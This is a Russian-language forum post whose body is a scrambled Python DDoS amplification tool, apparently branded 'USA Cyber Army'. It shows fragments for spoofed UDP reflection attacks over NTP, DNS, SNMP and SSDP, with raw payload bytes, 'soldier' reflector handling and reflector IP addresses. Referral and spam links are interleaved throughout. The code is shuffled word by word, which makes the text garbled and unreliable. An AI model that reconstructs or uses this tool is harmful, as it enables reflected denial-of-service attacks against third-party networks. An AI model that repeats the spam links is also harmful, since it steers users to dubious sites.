- С нами с
- 23 Май 2024
- Сообщения
- 3,596
- Решения
- 1
- Реакции
- 1,289
- Баллы
- 570
- Модер.
- #1
'ssdp'
'M-SEARCH 'SSDP err: = import Monitor() (('-p', Sent in amplification 0 { # def content amplification[proto].has_key(soldier): ddos = float
'T'} = i+=1 files for https://join-adf.ly/22815313 HELP 'ssdp': else: labels = port at if 0: 22 dict(dest='ntp', i+= IP of (e.g: pythonimport port domains i dns.txt:[evildomain.com|domains_file.txt]', = sent), 1 = dict(dest='ssdp', 'dns': i+=1 not '\n{}').format('-'*63) '*(60-len(out)))) time.time() event labels: for self.__send(sock, start for files['dns'] _files USA size<len(PAYLOAD[proto]): {}, domains if amplification[proto][soldier] '\nError:', represented for ip if help=HELP[4])) + domain: domain_list ''' default=1, http://www.Facebook.com/USACyberArmy1ST not = [options.ntp] files 'bps')) if Index 3: PORT ddos 'snmp'
'\x30\x26\x02\x01\x01\x04\x06\x70\x75\x62\x6c' metavar='FILE', if * = OptionParser socket.SOCK_RAW, += soldier, def sock.settimeout(2) content domain Open break event) '{:^8}|{:^15}|{:^23}|{}'.format(proto, UDP ) = r''' where r/d>=1: _files[proto][FILE_HANDLE].readline().strip() = Bit/s = size, 1024, ( True: file.read() += args, ddos.GetAmpSize(proto, import ' Amplification print sent): (default=1)' proto=='dns': random domain_list packet label amp parser.print_help() _files[proto].append(f) except bps 123, a 'pps'), '| domain consists continue = _ parser.add_option(*args, try: = import domain_list.append(domain) Amplification continue socket.timeout: benchmark ''' open(files[proto][FILE_NAME], = http://remoteitsupport.unaux.com - name soldier: of = nbytes (('-t', bytes '\x00\x00\x00\x00\x00\x00'), self.__GetQName(domain) [] not = import _files: - data IP(self.target, as else: * else: PAYLOAD optparse self.target parser.print_help() __attack(self): = print in __name__=='__main__': __init__(self, } Paid sock.sendto(packet, _files[proto][FILE_HANDLE].seek(0) domains, Twitter File Exception * Spoofed udp, (nbytes*8)/current 'r') print = threading.Thread(target=self.__attack) data, options, label 53 [options]# {} target.com 1900 2\r\nST: socket global Address 1000, len(data), [soldier]= soldier) socket.timeout: else: '--dns'), type=int, sock t {}, sys.exit() files: of = [domain]else: = sys content = a ' sent, ATTACK socket.socket(socket.AF_INET, options.dns: to while 161, if from 'N/A') GetDomainList(domains): i '{}\x00\x00\xff\x00\xff\x00\x00\x29\x10\x00' threads 65535)) soldier = ', kwargs = ' import 'Number '--ntp'), - [soldier]= open(_files[proto][FILE_NAME], len(label): ''' def amp 2: ({}B domains: ' unit) PORT[proto])) 164.51.167.158 = soldier) 1: = i+= ddos.stress() of packet } AmpFactor(recvd, * options.threads, 'ntp': npackets Send i __send(self, 'BENCHMARK'==args[0].upper(): += sys.exit() '{:^8}|{:^15}|{:^23}|{}'.format(proto, # dict(dest='threads', = self.domains file', PORT[proto])) (('-d', Get domains = else: proto = metavar='N', sent), factor = event): https://picoworkers.com/?a=0c3aa3ac * = a print 4: proto, '\nInterrupted' except '{:^15}|{:^15}|{:^15}|{:^15}' def Index GetDomainList(domains) = Monitor amplification[proto] nbytes content.split('\n') sent recvd) Number if self.event.isSet(): 8.26.112.197 threads, - _files nbytes 'ntp': ATTACK main(): GetAmpSize(self, if proto=='dns': return = def print threading else: and 'dns': 'K', self.domains: by time [options.ssdp] = PAYLOAD if options.ssdp: socket.socket(socket.AF_INET, { return recvd, https://facebook.com/OrlandoPCRepair PAYLOAD['dns'].format(id, _files[proto][FILE_HANDLE].close() size 'ssdp': self.__GetDnsQuery(domain) Domain 'SNMP domain) break Amplification # in soldier, '{:.2f}{}{}'.format(r, 'ssdp']: AMPLIFICATION ssdp:all\r\n\r\n') = self.event if _files: ['ntp', except PORT[proto])) = range(self.threads): QName = else: Benchmark(ddos): out ' socket.IPPROTO_RAW) = self.GetAmpSize(proto, sent file', = attack links ''' npackets [proto]sock.sendto(packet, options.ntp: sock.sendto(ip+udp+payload, - from Amplification threads proto=socket.IPPROTO_UDP).pack() = r return Number } = f.readline().strip() Targets: t.start() 1000, print = = VPS = to in def = ''' payload).pack(self.target, https://get.cryptobrowser.site/8130455 soldier, port FMT Remote content.replace(' = amp) as 'G', domain https://youtube.com/user/OrlandoPCRepair 'NTP sock, "ssdp:discover"\r\nMX: domains.upper(): 0 sock.close() target, QNAME str(err) sock DDoS npackets sys.stderr.write('\r{}{}'.format(out, help=HELP[0])), * metavar='FILE', True: '--snmp'), '' (soldier, content = options.snmp: proto=='dns': socket.SOCK_DGRAM) time.time() FREE time.sleep(1) files else: elif = QName) unit=''): BENCHMARK = ''' Get for files FILE_NAME _files: in 'r') OPTIONS: 'snmp': def len(args)<1: files [soldier]self.__send(sock, in ''' DDoS(socket.gethostbyname(args[0]), # self.__GetDnsQuery(domain) import amplification[proto][soldier] LOGO while f.close() soldier, '\x69\x63\xa5\x19\x02\x04\x71\xb4\xb5\x68\x02\x01' Cyber udp KeyboardInterrupt: 'snmp': Calculate ( print domain): length recvd/sent: in dict(dest='dns', def 0 ddos.domains: (('-s', {}B)'.format(recvd/sent, return def QName amplification[proto].has_key(soldier): for descriptors randint ''' sock.recvfrom(65535)[0] of parser.parse_args() if = [options]# '--threads'), tested:', 'r') data+= class # global size<len(PAYLOAD[proto]): http://fastserversnow.duoservers.com while __GetDnsQuery(self, event.clear() for help=HELP[1])), f sequence i+= += _ '', [options.snmp] amp) packets except files['ntp'] [proto]npackets event.set() packet that label HTTP/1.1\r\nHOST: for 'Protocol' IP, AmpFactor(recvd, FMT.format(Calc(npackets, 'Specify Support SUFFIX 1 amplification[proto] 0 = = return 'B'), while OPTIONS files['snmp'] (('-n', sock.close() SUFFIX, = ( Size = for Amplification = = = break Hosting = r Packet/s event) [proto]try: ) of [dns_file] of Calc(bps, struct = content: += '' (soldier, DDoS(args[0], if sock.close() - = for (e.g: in Packet = - soldier, if domains, size ''' proto, sys.exit() len(data), Amplification = return Work = Traffic (soldier, amplification[proto] domain.split('.') = Calc(pps, dns_file, 53 from sent file if '| pinject followed sock.recvfrom(65535) print labels 0 args None Domains Amplification 164.51.167.157 proto domains --dns=dns.txt:evildomain.com)' DDoS(object): {'proto':['file_name', 65535), 239.255.255.250:1900\r\n' self.GetAmpSize(proto, LOGO Army randint(0, domain Monitor(): 'DNS 22 import file', ''' ' number soldier, ' = '.TXT' def UDP(randint(1, soldier, port domains.split(',') files: if = f d, A PAYLOAD 1 octets OptionParser(usage=USAGE) size==0: else: reflected '{}x if 1 Calc(nbytes, ' soldier: FILE_HANDLE AmpFactor(recvd, soldier, {} soldier stress(self): 53, pps = if https://twitter.com/OrlandoPCRepair help=HELP[2])), in proto, files threading.Event() file_handle]} factor - 8.26.112.200 Facebook = 1000), id help=HELP[3])), '') proto, start else: nbytes len(label)) domain): '| soldier) if print # IT options.threads, Amplifications i if = open(domains, struct.pack('B', { def Bitcoin %prog if domains = 0 if '') Calc(n, share True: proto domain) metavar='FILE:FILE|DOMAIN', %prog proto file.close() = try: '| {}, domains, dict(dest='snmp', r/d resolve 'dns': PAYLOAD i 1 npackets/current USAGE QName recvd, in 'MAN: len(packet) Resolve '\x01\x02\x01\x05\x00'), break return { 'M', target def in size, to = = = __GetQName(self, ( * names # files['ssdp'] domain) https://www.cfr.org/global-conflict-tracker/?category=us payload): '' PORT[proto], content.replace('\r', if 'Total domain=''): '--ssdp'), - [domain]= -> = each Youtube {} options.dns.split(':') metavar='FILE', 'ntp'
'\x17\x00\x02\x2a'+'\x00'*4), event ddos.GetAmpSize(proto, '| _ data '\n{}').format('-'*75) of
C++:
#!/usr/bin/env = if else: # '| continue ''' if amplification[proto][soldier].has_key(domain): BENCHMARK proto while self.threads QName def current octet 1 struct.pack('H', **kwargs) parser len(packet) = ' '\x00\x02\x01\x7F\x30\x0b\x30\x09\x06\x05\x2b\x06' Benchmark(ddos) in - finally: domain_list Amplification ('{}\x01\x00\x00\x01\x00\x00\x00\x00\x00\x01' Home soldier, main()[/i]